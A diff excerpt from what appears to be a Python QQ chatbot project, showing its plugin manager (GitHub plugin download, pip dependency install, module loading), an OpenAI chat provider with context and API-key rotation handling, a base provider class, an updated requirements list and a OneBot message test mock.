process = subprocess.Popen(f"{py} -m pip install -r {path} -i {mirror} --break-system-package --trusted-host mirrors.aliyun.com",
|
||||
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True, universal_newlines=True)
|
||||
|
||||
while True:
|
||||
output = process.stdout.readline()
|
||||
if output == '' and process.poll() is not None:
|
||||
break
|
||||
if output:
|
||||
output = output.strip()
|
||||
if output.startswith("Requirement already satisfied"):
|
||||
continue
|
||||
if output.startswith("Using cached"):
|
||||
continue
|
||||
if output.startswith("Looking in indexes"):
|
||||
continue
|
||||
logger.info(output)
|
||||
|
||||
rc = process.poll()
|
||||
|
||||
|
||||
async def install_plugin(self, repo_url: str):
|
||||
ppath = self.plugin_store_path
|
||||
|
||||
# we no longer use Git anymore :)
|
||||
# Repo.clone_from(repo_url, to_path=plugin_path, branch='master')
|
||||
|
||||
plugin_path = await self.updator.update(repo_url)
|
||||
with open(os.path.join(plugin_path, "REPO"), "w", encoding='utf-8') as f:
|
||||
f.write(repo_url)
|
||||
|
||||
self.check_plugin_dept_update()
|
||||
|
||||
return plugin_path
|
||||
# ok, err = self.plugin_reload()
|
||||
# if not ok:
|
||||
# raise Exception(err)
|
||||
|
||||
async def download_from_repo_url(self, target_path: str, repo_url: str):
|
||||
repo_namespace = repo_url.split("/")[-2:]
|
||||
author = repo_namespace[0]
|
||||
repo = repo_namespace[1]
|
||||
|
||||
logger.info(f"正在下载插件 {repo} ...")
|
||||
release_url = f"https://api.github.com/repos/{author}/{repo}/releases"
|
||||
releases = await self.updator.fetch_release_info(url=release_url)
|
||||
if not releases:
|
||||
# download from the default branch directly.
|
||||
logger.warn(f"未在插件 {author}/{repo} 中找到任何发布版本,将从默认分支下载。")
|
||||
release_url = f"https://github.com/{author}/{repo}/archive/refs/heads/master.zip"
|
||||
else:
|
||||
release_url = releases[0]['zipball_url']
|
||||
|
||||
await download_file(release_url, target_path + ".zip")
|
||||
|
||||
def get_registered_plugin(self, plugin_name: str) -> RegisteredPlugin:
|
||||
for p in self.context.cached_plugins:
|
||||
if p.metadata.plugin_name == plugin_name:
|
||||
return p
|
||||
|
||||
def uninstall_plugin(self, plugin_name: str):
|
||||
plugin = self.get_registered_plugin(plugin_name)
|
||||
if not plugin:
|
||||
raise Exception("插件不存在。")
|
||||
root_dir_name = plugin.root_dir_name
|
||||
ppath = self.plugin_store_path
|
||||
self.context.cached_plugins.remove(plugin)
|
||||
if not remove_dir(os.path.join(ppath, root_dir_name)):
|
||||
raise Exception("移除插件成功,但是删除插件文件夹失败。您可以手动删除该文件夹,位于 addons/plugins/ 下。")
|
||||
|
||||
async def update_plugin(self, plugin_name: str):
|
||||
plugin = self.get_registered_plugin(plugin_name)
|
||||
if not plugin:
|
||||
raise Exception("插件不存在。")
|
||||
|
||||
await self.updator.update(plugin)
|
||||
|
||||
def plugin_reload(self):
|
||||
cached_plugins = self.context.cached_plugins
|
||||
plugins = self.get_plugin_modules()
|
||||
if plugins is None:
|
||||
return False, "未找到任何插件模块"
|
||||
fail_rec = ""
|
||||
|
||||
registered_map = {}
|
||||
for p in cached_plugins:
|
||||
registered_map[p.module_path] = None
|
||||
|
||||
for plugin in plugins:
|
||||
try:
|
||||
p = plugin['module']
|
||||
module_path = plugin['module_path']
|
||||
root_dir_name = plugin['pname']
|
||||
|
||||
logger.info(f"正在加载插件 {root_dir_name} ...")
|
||||
|
||||
self.check_plugin_dept_update(target_plugin=root_dir_name)
|
||||
|
||||
module = __import__("data.plugins." +
|
||||
root_dir_name + "." + p, fromlist=[p])
|
||||
|
||||
cls = self.get_classes(module)
|
||||
|
||||
try:
|
||||
# 尝试传入 ctx
|
||||
obj = getattr(module, cls[0])(context=self.context)
|
||||
except TypeError:
|
||||
obj = getattr(module, cls[0])()
|
||||
except BaseException as e:
|
||||
raise e
|
||||
|
||||
metadata = None
|
||||
|
||||
plugin_path = os.path.join(self.plugin_store_path, root_dir_name)
|
||||
metadata = self.load_plugin_metadata(plugin_path=plugin_path, plugin_obj=obj)
|
||||
|
||||
logger.info(f"插件 {metadata.plugin_name}({metadata.author}) 加载成功。")
|
||||
|
||||
if module_path not in registered_map:
|
||||
cached_plugins.append(RegisteredPlugin(
|
||||
metadata=metadata,
|
||||
plugin_instance=obj,
|
||||
module=module,
|
||||
module_path=module_path,
|
||||
root_dir_name=root_dir_name
|
||||
))
|
||||
except BaseException as e:
|
||||
traceback.print_exc()
|
||||
fail_rec += f"加载{p}插件出现问题,原因 {str(e)}\n"
|
||||
|
||||
if not fail_rec:
|
||||
return True, None
|
||||
else:
|
||||
return False, fail_rec
|
||||
|
||||
def install_plugin_from_file(self, zip_file_path: str):
|
||||
# try to unzip
|
||||
temp_dir = os.path.join(os.path.dirname(zip_file_path), str(uuid.uuid4()))
|
||||
self.updator.unzip_file(zip_file_path, temp_dir)
|
||||
# check if the plugin has metadata.yaml
|
||||
if not os.path.exists(os.path.join(temp_dir, "metadata.yaml")):
|
||||
remove_dir(temp_dir)
|
||||
raise Exception("插件缺少 metadata.yaml 文件。")
|
||||
|
||||
metadata = self.load_plugin_metadata(temp_dir)
|
||||
plugin_name = metadata.plugin_name
|
||||
if not plugin_name:
|
||||
remove_dir(temp_dir)
|
||||
raise Exception("插件 metadata.yaml 文件中 name 字段为空。")
|
||||
plugin_name = self.updator.format_name(plugin_name)
|
||||
|
||||
ppath = self.plugin_store_path
|
||||
plugin_path = os.path.join(ppath, plugin_name)
|
||||
if os.path.exists(plugin_path):
|
||||
remove_dir(plugin_path)
|
||||
|
||||
# move to the target path
|
||||
shutil.move(temp_dir, plugin_path)
|
||||
|
||||
if metadata.repo:
|
||||
with open(os.path.join(plugin_path, "REPO"), "w", encoding='utf-8') as f:
|
||||
f.write(metadata.repo)
|
||||
|
||||
# remove the temp dir
|
||||
remove_dir(temp_dir)
|
||||
|
||||
self.check_plugin_dept_update()
|
||||
|
||||
# ok, err = self.plugin_reload()
|
||||
# if not ok:
|
||||
# raise Exception(err)
|
||||
|
||||
def load_plugin_metadata(self, plugin_path: str, plugin_obj = None) -> PluginMetadata:
|
||||
metadata = None
|
||||
|
||||
if not os.path.exists(plugin_path):
|
||||
raise Exception("插件不存在。")
|
||||
|
||||
if os.path.exists(os.path.join(plugin_path, "metadata.yaml")):
|
||||
with open(os.path.join(plugin_path, "metadata.yaml"), "r", encoding='utf-8') as f:
|
||||
metadata = yaml.safe_load(f)
|
||||
elif plugin_obj:
|
||||
# 使用 info() 函数
|
||||
metadata = plugin_obj.info()
|
||||
|
||||
if isinstance(metadata, dict):
|
||||
if 'name' not in metadata or 'desc' not in metadata or 'version' not in metadata or 'author' not in metadata:
|
||||
raise Exception("插件元数据信息不完整。")
|
||||
metadata = PluginMetadata(
|
||||
plugin_name=metadata['name'],
|
||||
plugin_type=PluginType.COMMON if 'plugin_type' not in metadata else PluginType(metadata['plugin_type']),
|
||||
author=metadata['author'],
|
||||
desc=metadata['desc'],
|
||||
version=metadata['version'],
|
||||
repo=metadata['repo'] if 'repo' in metadata else None
|
||||
)
|
||||
|
||||
return metadata
|
||||
509
model/provider/openai_official.py
Normal file
@@ -0,0 +1,509 @@
|
||||
import os
|
||||
import asyncio
|
||||
import json
|
||||
import time
|
||||
import tiktoken
|
||||
import threading
|
||||
import traceback
|
||||
import base64
|
||||
|
||||
from openai import AsyncOpenAI
|
||||
from openai.types.chat.chat_completion import ChatCompletion
|
||||
from openai._exceptions import *
|
||||
from util.io import download_image_by_url
|
||||
|
||||
from astrbot.persist.helper import dbConn
|
||||
from model.provider.provider import Provider
|
||||
from util.cmd_config import LLMConfig
|
||||
from SparkleLogging.utils.core import LogManager
|
||||
from logging import Logger
|
||||
from typing import List, Dict
|
||||
|
||||
from dataclasses import asdict
|
||||
|
||||
logger: Logger = LogManager.GetLogger(log_name='astrbot')
|
||||
|
||||
MODELS = {
|
||||
"gpt-4o": 128000,
|
||||
"gpt-4o-2024-05-13": 128000,
|
||||
"gpt-4-turbo": 128000,
|
||||
"gpt-4-turbo-2024-04-09": 128000,
|
||||
"gpt-4-turbo-preview": 128000,
|
||||
"gpt-4-0125-preview": 128000,
|
||||
"gpt-4-1106-preview": 128000,
|
||||
"gpt-4-vision-preview": 128000,
|
||||
"gpt-4-1106-vision-preview": 128000,
|
||||
"gpt-4": 8192,
|
||||
"gpt-4-0613": 8192,
|
||||
"gpt-4-32k": 32768,
|
||||
"gpt-4-32k-0613": 32768,
|
||||
"gpt-3.5-turbo-0125": 16385,
|
||||
"gpt-3.5-turbo": 16385,
|
||||
"gpt-3.5-turbo-1106": 16385,
|
||||
"gpt-3.5-turbo-instruct": 4096,
|
||||
"gpt-3.5-turbo-16k": 16385,
|
||||
"gpt-3.5-turbo-0613": 16385,
|
||||
"gpt-3.5-turbo-16k-0613": 16385,
|
||||
}
|
||||
|
||||
class ProviderOpenAIOfficial(Provider):
|
||||
def __init__(self, llm_config: LLMConfig) -> None:
|
||||
super().__init__()
|
||||
|
||||
self.api_keys = []
|
||||
self.chosen_api_key = None
|
||||
self.base_url = None
|
||||
self.llm_config = llm_config
|
||||
self.keys_data = {} # 记录超额
|
||||
if llm_config.key: self.api_keys = llm_config.key
|
||||
if llm_config.api_base: self.base_url = llm_config.api_base
|
||||
if not self.api_keys:
|
||||
logger.warn("看起来你没有添加 OpenAI 的 API 密钥,OpenAI LLM 能力将不会启用。")
|
||||
else:
|
||||
self.chosen_api_key = self.api_keys[0]
|
||||
|
||||
for key in self.api_keys:
|
||||
self.keys_data[key] = True
|
||||
|
||||
self.client = AsyncOpenAI(
|
||||
api_key=self.chosen_api_key,
|
||||
base_url=self.base_url
|
||||
)
|
||||
super().set_curr_model(llm_config.model_config.model)
|
||||
if llm_config.image_generation_model_config:
|
||||
self.image_generator_model_configs: Dict = asdict(llm_config.image_generation_model_config)
|
||||
self.session_memory: Dict[str, List] = {} # 会话记忆
|
||||
self.session_memory_lock = threading.Lock()
|
||||
self.max_tokens = self.llm_config.model_config.max_tokens # 上下文窗口大小
|
||||
|
||||
logger.info("正在载入分词器 cl100k_base...")
|
||||
self.tokenizer = tiktoken.get_encoding("cl100k_base") # todo: 根据 model 切换分词器
|
||||
logger.info("分词器载入完成。")
|
||||
|
||||
self.DEFAULT_PERSONALITY = {
|
||||
"prompt": self.llm_config.default_personality,
|
||||
"name": "default"
|
||||
}
|
||||
self.curr_personality = self.DEFAULT_PERSONALITY
|
||||
self.session_personality = {} # 记录了某个session是否已设置人格。
|
||||
# 从 SQLite DB 读取历史记录
|
||||
try:
|
||||
db1 = dbConn()
|
||||
for session in db1.get_all_session():
|
||||
self.session_memory_lock.acquire()
|
||||
self.session_memory[session[0]] = json.loads(session[1])['data']
|
||||
self.session_memory_lock.release()
|
||||
except BaseException as e:
|
||||
logger.warn(f"读取 OpenAI LLM 对话历史记录 失败:{e}。仍可正常使用。")
|
||||
|
||||
# 定时保存历史记录
|
||||
threading.Thread(target=self.dump_history, daemon=True).start()
|
||||
|
||||
def dump_history(self):
|
||||
'''
|
||||
转储历史记录
|
||||
'''
|
||||
time.sleep(10)
|
||||
db = dbConn()
|
||||
while True:
|
||||
try:
|
||||
for key in self.session_memory:
|
||||
data = self.session_memory[key]
|
||||
data_json = {
|
||||
'data': data
|
||||
}
|
||||
if db.check_session(key):
|
||||
db.update_session(key, json.dumps(data_json))
|
||||
else:
|
||||
db.insert_session(key, json.dumps(data_json))
|
||||
logger.debug("已保存 OpenAI 会话历史记录")
|
||||
except BaseException as e:
|
||||
print(e)
|
||||
finally:
|
||||
time.sleep(10*60)
|
||||
|
||||
def personality_set(self, default_personality: dict, session_id: str):
|
||||
if not default_personality: return
|
||||
if session_id not in self.session_memory:
|
||||
self.session_memory[session_id] = []
|
||||
self.curr_personality = default_personality
|
||||
self.session_personality = {} # 重置
|
||||
encoded_prompt = self.tokenizer.encode(default_personality['prompt'])
|
||||
tokens_num = len(encoded_prompt)
|
||||
model = self.get_curr_model()
|
||||
if model in MODELS and tokens_num > MODELS[model] - 500:
|
||||
default_personality['prompt'] = self.tokenizer.decode(encoded_prompt[:MODELS[model] - 500])
|
||||
|
||||
new_record = {
|
||||
"user": {
|
||||
"role": "system",
|
||||
"content": default_personality['prompt'],
|
||||
},
|
||||
'usage_tokens': 0, # 到该条目的总 token 数
|
||||
'single-tokens': 0 # 该条目的 token 数
|
||||
}
|
||||
|
||||
self.session_memory[session_id].append(new_record)
|
||||
|
||||
async def encode_image_bs64(self, image_url: str) -> str:
|
||||
'''
|
||||
将图片转换为 base64
|
||||
'''
|
||||
if image_url.startswith("http"):
|
||||
image_url = await download_image_by_url(image_url)
|
||||
|
||||
with open(image_url, "rb") as f:
|
||||
image_bs64 = base64.b64encode(f.read()).decode()
|
||||
return "data:image/jpeg;base64," + image_bs64
|
||||
|
||||
async def retrieve_context(self, session_id: str):
|
||||
'''
|
||||
根据 session_id 获取保存的 OpenAI 格式的上下文
|
||||
'''
|
||||
if session_id not in self.session_memory:
|
||||
raise Exception("会话 ID 不存在")
|
||||
|
||||
# 转换为 openai 要求的格式
|
||||
context = []
|
||||
is_lvm = await self.is_lvm()
|
||||
for record in self.session_memory[session_id]:
|
||||
if "user" in record and record['user']:
|
||||
if not is_lvm and "content" in record['user'] and isinstance(record['user']['content'], list):
|
||||
logger.warn(f"由于当前模型 {self.get_curr_model()} 不支持视觉,将忽略上下文中的图片输入。如果一直弹出此警告,可以尝试 reset 指令。")
|
||||
continue
|
||||
context.append(record['user'])
|
||||
if "AI" in record and record['AI']:
|
||||
context.append(record['AI'])
|
||||
|
||||
return context
|
||||
|
||||
async def is_lvm(self):
|
||||
'''
|
||||
是否是 LVM
|
||||
'''
|
||||
return self.get_curr_model().startswith("gpt-4")
|
||||
|
||||
async def get_models(self):
|
||||
try:
|
||||
models = await self.client.models.list()
|
||||
except NotFoundError as e:
|
||||
bu = str(self.client.base_url)
|
||||
self.client.base_url = bu + "/v1"
|
||||
models = await self.client.models.list()
|
||||
finally:
|
||||
return filter(lambda x: x.id.startswith("gpt"), models.data)
|
||||
|
||||
async def assemble_context(self, session_id: str, prompt: str, image_url: str = None):
|
||||
'''
|
||||
组装上下文,并且根据当前上下文窗口大小截断
|
||||
'''
|
||||
if session_id not in self.session_memory:
|
||||
raise Exception("会话 ID 不存在")
|
||||
|
||||
tokens_num = len(self.tokenizer.encode(prompt))
|
||||
previous_total_tokens_num = 0 if not self.session_memory[session_id] else self.session_memory[session_id][-1]['usage_tokens']
|
||||
|
||||
message = {
|
||||
"usage_tokens": previous_total_tokens_num + tokens_num,
|
||||
"single_tokens": tokens_num,
|
||||
"AI": None
|
||||
}
|
||||
if image_url:
|
||||
user_content = {
|
||||
"role": "user",
|
||||
"content": [
|
||||
{
|
||||
"type": "text",
|
||||
"text": prompt
|
||||
},
|
||||
{
|
||||
"type": "image_url",
|
||||
"image_url": {
|
||||
"url": await self.encode_image_bs64(image_url)
|
||||
}
|
||||
}
|
||||
]
|
||||
}
|
||||
else:
|
||||
user_content = {
|
||||
"role": "user",
|
||||
"content": prompt
|
||||
}
|
||||
|
||||
message["user"] = user_content
|
||||
self.session_memory[session_id].append(message)
|
||||
|
||||
# 根据 模型的上下文窗口 淘汰掉多余的记录
|
||||
curr_model = self.get_curr_model()
|
||||
if curr_model in MODELS:
|
||||
maxium_tokens_num = MODELS[curr_model] - 300 # 至少预留 300 给 completion
|
||||
# if message['usage_tokens'] > maxium_tokens_num:
|
||||
# 淘汰多余的记录,使得最终的 usage_tokens 不超过 maxium_tokens_num - 300
|
||||
# contexts = self.session_memory[session_id]
|
||||
# need_to_remove_idx = 0
|
||||
# freed_tokens_num = contexts[0]['single-tokens']
|
||||
# while freed_tokens_num < message['usage_tokens'] - maxium_tokens_num:
|
||||
# need_to_remove_idx += 1
|
||||
# freed_tokens_num += contexts[need_to_remove_idx]['single-tokens']
|
||||
# # 更新之后的所有记录的 usage_tokens
|
||||
# for i in range(len(contexts)):
|
||||
# if i > need_to_remove_idx:
|
||||
# contexts[i]['usage_tokens'] -= freed_tokens_num
|
||||
# logger.debug(f"淘汰上下文记录 {need_to_remove_idx+1} 条,释放 {freed_tokens_num} 个 token。当前上下文总 token 为 {contexts[-1]['usage_tokens']}。")
|
||||
# self.session_memory[session_id] = contexts[need_to_remove_idx+1:]
|
||||
while len(self.session_memory[session_id]) and self.session_memory[session_id][-1]['usage_tokens'] > maxium_tokens_num:
|
||||
self.pop_record(session_id)
|
||||
|
||||
|
||||
async def pop_record(self, session_id: str, pop_system_prompt: bool = False):
|
||||
'''
|
||||
弹出第一条记录
|
||||
'''
|
||||
if session_id not in self.session_memory:
|
||||
raise Exception("会话 ID 不存在")
|
||||
|
||||
if len(self.session_memory[session_id]) == 0:
|
||||
return None
|
||||
|
||||
for i in range(len(self.session_memory[session_id])):
|
||||
# 检查是否是 system prompt
|
||||
if not pop_system_prompt and self.session_memory[session_id][i]['user']['role'] == "system":
|
||||
# 如果只有一个 system prompt,才不删掉
|
||||
f = False
|
||||
for j in range(i+1, len(self.session_memory[session_id])):
|
||||
if self.session_memory[session_id][j]['user']['role'] == "system":
|
||||
f = True
|
||||
break
|
||||
if not f:
|
||||
continue
|
||||
record = self.session_memory[session_id].pop(i)
|
||||
break
|
||||
|
||||
# 更新之后所有记录的 usage_tokens
|
||||
for i in range(len(self.session_memory[session_id])):
|
||||
self.session_memory[session_id][i]['usage_tokens'] -= record['single-tokens']
|
||||
logger.debug(f"淘汰上下文记录 1 条,释放 {record['single-tokens']} 个 token。当前上下文总 token 为 {self.session_memory[session_id][-1]['usage_tokens']}。")
|
||||
return record
|
||||
|
||||
async def text_chat(self,
|
||||
prompt: str,
|
||||
session_id: str,
|
||||
image_url: None=None,
|
||||
tools: None=None,
|
||||
extra_conf: Dict = None,
|
||||
**kwargs
|
||||
) -> str:
|
||||
if os.environ.get("TEST_LLM", "off") != "on" and os.environ.get("TEST_MODE", "off") == "on":
|
||||
return "这是一个测试消息。"
|
||||
|
||||
super().accu_model_stat()
|
||||
if not session_id:
|
||||
session_id = "unknown"
|
||||
if "unknown" in self.session_memory:
|
||||
del self.session_memory["unknown"]
|
||||
|
||||
if session_id not in self.session_memory:
|
||||
self.session_memory[session_id] = []
|
||||
|
||||
if session_id not in self.session_personality or not self.session_personality[session_id]:
|
||||
self.personality_set(self.curr_personality, session_id)
|
||||
self.session_personality[session_id] = True
|
||||
|
||||
# 如果 prompt 超过了最大窗口,截断。
|
||||
# 1. 可以保证之后 pop 的时候不会出现问题
|
||||
# 2. 可以保证不会超过最大 token 数
|
||||
_encoded_prompt = self.tokenizer.encode(prompt)
|
||||
curr_model = self.get_curr_model()
|
||||
if curr_model in MODELS and len(_encoded_prompt) > MODELS[curr_model] - 300:
|
||||
_encoded_prompt = _encoded_prompt[:MODELS[curr_model] - 300]
|
||||
prompt = self.tokenizer.decode(_encoded_prompt)
|
||||
|
||||
# 组装上下文,并且根据当前上下文窗口大小截断
|
||||
await self.assemble_context(session_id, prompt, image_url)
|
||||
|
||||
# 获取上下文,openai 格式
|
||||
contexts = await self.retrieve_context(session_id)
|
||||
|
||||
conf = asdict(self.llm_config.model_config)
|
||||
if extra_conf: conf.update(extra_conf)
|
||||
|
||||
# start request
|
||||
retry = 0
|
||||
rate_limit_retry = 0
|
||||
while retry < 3 or rate_limit_retry < 5:
|
||||
logger.debug(conf)
|
||||
logger.debug(contexts)
|
||||
if tools:
|
||||
completion_coro = self.client.chat.completions.create(
|
||||
messages=contexts,
|
||||
tools=tools,
|
||||
**conf
|
||||
)
|
||||
else:
|
||||
completion_coro = self.client.chat.completions.create(
|
||||
messages=contexts,
|
||||
**conf
|
||||
)
|
||||
try:
|
||||
completion = await completion_coro
|
||||
break
|
||||
except AuthenticationError as e:
|
||||
api_key = self.chosen_api_key[10:] + "..."
|
||||
logger.error(f"OpenAI API Key {api_key} 验证错误。详细原因:{e}。正在切换到下一个可用的 Key(如果有的话)")
|
||||
self.keys_data[self.chosen_api_key] = False
|
||||
ok = await self.switch_to_next_key()
|
||||
if ok: continue
|
||||
else: raise Exception("所有 OpenAI API Key 目前都不可用。")
|
||||
except BadRequestError as e:
|
||||
retry += 1
|
||||
logger.warn(f"OpenAI 请求异常:{e}。")
|
||||
if "image_url is only supported by certain models." in str(e):
|
||||
raise Exception(f"当前模型 { self.get_curr_model() } 不支持图片输入,请更换模型。")
|
||||
except RateLimitError as e:
|
||||
if "You exceeded your current quota" in str(e):
|
||||
self.keys_data[self.chosen_api_key] = False
|
||||
ok = await self.switch_to_next_key()
|
||||
if ok: continue
|
||||
else: raise Exception("所有 OpenAI API Key 目前都不可用。")
|
||||
logger.error(f"OpenAI API Key {self.chosen_api_key} 达到请求速率限制或者官方服务器当前超载。详细原因:{e}")
|
||||
await self.switch_to_next_key()
|
||||
rate_limit_retry += 1
|
||||
await asyncio.sleep(1)
|
||||
except NotFoundError as e:
|
||||
raise e
|
||||
except Exception as e:
|
||||
retry += 1
|
||||
if retry >= 3:
|
||||
logger.error(traceback.format_exc())
|
||||
raise Exception(f"OpenAI 请求失败:{e}。重试次数已达到上限。")
|
||||
if "maximum context length" in str(e):
|
||||
logger.warn(f"OpenAI 请求失败:{e}。上下文长度超过限制。尝试弹出最早的记录然后重试。")
|
||||
self.pop_record(session_id)
|
||||
|
||||
logger.warning(traceback.format_exc())
|
||||
logger.warning(f"OpenAI 请求失败:{e}。重试第 {retry} 次。")
|
||||
await asyncio.sleep(1)
|
||||
|
||||
assert isinstance(completion, ChatCompletion)
|
||||
logger.debug(f"openai completion: {completion.usage}")
|
||||
|
||||
if len(completion.choices) == 0:
|
||||
raise Exception("OpenAI API 返回的 completion 为空。")
|
||||
choice = completion.choices[0]
|
||||
|
||||
usage_tokens = completion.usage.total_tokens
|
||||
completion_tokens = completion.usage.completion_tokens
|
||||
self.session_memory[session_id][-1]['usage_tokens'] = usage_tokens
|
||||
self.session_memory[session_id][-1]['single_tokens'] += completion_tokens
|
||||
|
||||
if choice.message.content:
|
||||
# 返回文本
|
||||
completion_text = str(choice.message.content).strip()
|
||||
elif choice.message.tool_calls and choice.message.tool_calls:
|
||||
# tools call (function calling)
|
||||
return choice.message.tool_calls[0].function
|
||||
|
||||
self.session_memory[session_id][-1]['AI'] = {
|
||||
"role": "assistant",
|
||||
"content": completion_text
|
||||
}
|
||||
|
||||
return completion_text
|
||||
|
||||
async def switch_to_next_key(self):
|
||||
'''
|
||||
切换到下一个 API Key
|
||||
'''
|
||||
if not self.api_keys:
|
||||
logger.error("OpenAI API Key 不存在。")
|
||||
return False
|
||||
|
||||
for key in self.keys_data:
|
||||
if self.keys_data[key]:
|
||||
# 没超额
|
||||
self.chosen_api_key = key
|
||||
self.client.api_key = key
|
||||
logger.info(f"OpenAI 切换到 API Key {key[:10]}... 成功。")
|
||||
return True
|
||||
|
||||
return False
|
||||
|
||||
async def image_generate(self, prompt: str, session_id: str = None, **kwargs) -> str:
|
||||
'''
|
||||
生成图片
|
||||
'''
|
||||
retry = 0
|
||||
conf = self.image_generator_model_configs
|
||||
if not conf:
|
||||
logger.error("OpenAI 图片生成模型配置不存在。")
|
||||
raise Exception("OpenAI 图片生成模型配置不存在。")
|
||||
super().accu_model_stat(model=conf['model'])
|
||||
while retry < 3:
|
||||
try:
|
||||
images_response = await self.client.images.generate(
|
||||
prompt=prompt,
|
||||
**conf
|
||||
)
|
||||
image_url = images_response.data[0].url
|
||||
return image_url
|
||||
except Exception as e:
|
||||
retry += 1
|
||||
if retry >= 3:
|
||||
logger.error(traceback.format_exc())
|
||||
raise Exception(f"OpenAI 图片生成请求失败:{e}。重试次数已达到上限。")
|
||||
logger.warning(f"OpenAI 图片生成请求失败:{e}。重试第 {retry} 次。")
|
||||
await asyncio.sleep(1)
|
||||
|
||||
async def forget(self, session_id=None, keep_system_prompt: bool=False) -> bool:
|
||||
if session_id is None: return False
|
||||
self.session_memory[session_id] = []
|
||||
if keep_system_prompt:
|
||||
self.personality_set(self.curr_personality, session_id)
|
||||
else:
|
||||
self.curr_personality = self.DEFAULT_PERSONALITY
|
||||
return True
|
||||
|
||||
def dump_contexts_page(self, session_id: str, size=5, page=1,):
|
||||
'''
|
||||
获取缓存的会话
|
||||
'''
|
||||
# contexts_str = ""
|
||||
# for i, key in enumerate(self.session_memory):
|
||||
# if i < (page-1)*size or i >= page*size:
|
||||
# continue
|
||||
# contexts_str += f"Session ID: {key}\n"
|
||||
# for record in self.session_memory[key]:
|
||||
# if "user" in record:
|
||||
# contexts_str += f"User: {record['user']['content']}\n"
|
||||
# if "AI" in record:
|
||||
# contexts_str += f"AI: {record['AI']['content']}\n"
|
||||
# contexts_str += "---\n"
|
||||
contexts_str = ""
|
||||
if session_id in self.session_memory:
|
||||
for record in self.session_memory[session_id]:
|
||||
if "user" in record and record['user']:
|
||||
text = record['user']['content'][:100] + "..." if len(record['user']['content']) > 100 else record['user']['content']
|
||||
contexts_str += f"User: {text}\n"
|
||||
if "AI" in record and record['AI']:
|
||||
text = record['AI']['content'][:100] + "..." if len(record['AI']['content']) > 100 else record['AI']['content']
|
||||
contexts_str += f"Assistant: {text}\n"
|
||||
else:
|
||||
contexts_str = "会话 ID 不存在。"
|
||||
|
||||
return contexts_str, len(self.session_memory[session_id])
|
||||
|
||||
def set_model(self, model: str):
|
||||
# TODO: 更新配置文件
|
||||
super().set_curr_model(model)
|
||||
|
||||
def get_configs(self):
|
||||
return asdict(self.llm_config)
|
||||
|
||||
def get_keys_data(self):
|
||||
return self.keys_data
|
||||
|
||||
def get_curr_key(self):
|
||||
return self.chosen_api_key
|
||||
|
||||
def set_key(self, key):
|
||||
self.client.api_key = key
|
||||
58
model/provider/provider.py
Normal file
@@ -0,0 +1,58 @@
|
||||
from collections import defaultdict
|
||||
|
||||
class Provider:
|
||||
def __init__(self) -> None:
|
||||
self.model_stat = defaultdict(int) # 用于记录 LLM Model 使用数据
|
||||
self.curr_model_name = "unknown"
|
||||
|
||||
def reset_model_stat(self):
|
||||
self.model_stat.clear()
|
||||
|
||||
def set_curr_model(self, model_name: str):
|
||||
self.curr_model_name = model_name
|
||||
|
||||
def get_curr_model(self):
|
||||
'''
|
||||
返回当前正在使用的 LLM
|
||||
'''
|
||||
return self.curr_model_name
|
||||
|
||||
def accu_model_stat(self, model: str = None):
|
||||
if not model:
|
||||
model = self.get_curr_model()
|
||||
self.model_stat[model] += 1
|
||||
|
||||
async def text_chat(self,
|
||||
prompt: str,
|
||||
session_id: str,
|
||||
image_url: None = None,
|
||||
tools: None = None,
|
||||
extra_conf: dict = None,
|
||||
default_personality: dict = None,
|
||||
**kwargs) -> str:
|
||||
'''
|
||||
[require]
|
||||
prompt: 提示词
|
||||
session_id: 会话id
|
||||
|
||||
[optional]
|
||||
image_url: 图片url(识图)
|
||||
tools: 函数调用工具
|
||||
extra_conf: 额外配置
|
||||
default_personality: 默认人格
|
||||
'''
|
||||
raise NotImplementedError()
|
||||
|
||||
async def image_generate(self, prompt, session_id, **kwargs) -> str:
|
||||
'''
|
||||
[require]
|
||||
prompt: 提示词
|
||||
session_id: 会话id
|
||||
'''
|
||||
raise NotImplementedError()
|
||||
|
||||
async def forget(self, session_id=None) -> bool:
|
||||
'''
|
||||
重置会话
|
||||
'''
|
||||
raise NotImplementedError()
|
||||
@@ -1,3 +1,17 @@
|
||||
requests~=2.28.2
|
||||
openai~=0.26.5
|
||||
qq-botpy~=1.1.2
|
||||
pydantic~=1.10.4
|
||||
aiohttp
|
||||
openai
|
||||
qq-botpy
|
||||
chardet~=5.1.0
|
||||
Pillow
|
||||
nakuru-project
|
||||
beautifulsoup4
|
||||
googlesearch-python
|
||||
tiktoken
|
||||
readability-lxml
|
||||
websockets
|
||||
flask
|
||||
psutil
|
||||
lxml_html_clean
|
||||
SparkleLogging
|
||||
aiocqhttp
|
||||
|
||||
|
Before Width: | Height: | Size: 143 KiB |
|
Before Width: | Height: | Size: 110 KiB |
|
Before Width: | Height: | Size: 241 KiB |
|
Before Width: | Height: | Size: 239 KiB |
|
Before Width: | Height: | Size: 59 KiB |
18
tests/mocks/onebot.py
Normal file
@@ -0,0 +1,18 @@
|
||||
import copy
|
||||
from aiocqhttp import Event
|
||||
|
||||
class MockOneBotMessage():
|
||||
def __init__(self):
|
||||
# 这些数据不是敏感的
|
||||
self.group_event_sample = Event.from_payload({'self_id': 3430871669, 'user_id': 905617992, 'time': 1723882500, 'message_id': -2147480159, 'message_seq': -2147480159, 'real_id': -2147480159, 'message_type': 'group', 'sender': {'user_id': 905617992, 'nickname': 'Soulter', 'card': '', 'role': 'owner'}, 'raw_message': '[CQ:at,qq=3430871669] just reply me `ok`', 'font': 14, 'sub_type': 'normal', 'message': [{'data': {'qq': '3430871669'}, 'type': 'at'}, {'data': {'text': ' just reply me `ok`'}, 'type': 'text'}], 'message_format': 'array', 'post_type': 'message', 'group_id': 849750470})
|
||||
self.friend_event_sample = Event.from_payload({'self_id': 3430871669, 'user_id': 905617992, 'time': 1723882599, 'message_id': -2147480157, 'message_seq': -2147480157, 'real_id': -2147480157, 'message_type': 'private', 'sender': {'user_id': 905617992, 'nickname': 'Soulter', 'card': ''}, 'raw_message': 'just reply me `ok`', 'font': 14, 'sub_type': 'friend', 'message': [{'data': {'text': 'just reply me `ok`'}, 'type': 'text'}], 'message_format': 'array', 'post_type': 'message'})
|
||||
|
||||
def create_random_group_message(self):
|
||||
return self.group_event_sample
|
||||
|
||||
def create_random_direct_message(self):
|
||||
return self.friend_event_sample
|
||||
|
||||
def create_msg(self, text: str):
|
||||
self.group_event_sample.message = [{'data': {'qq': '3430871669'}, 'type': 'at'}, {'data': {'text': text}, 'type': 'text'}]
|
||||
return self.group_event_sample
|
||||
54
tests/mocks/qq_official.py
Normal file
@@ -0,0 +1,54 @@
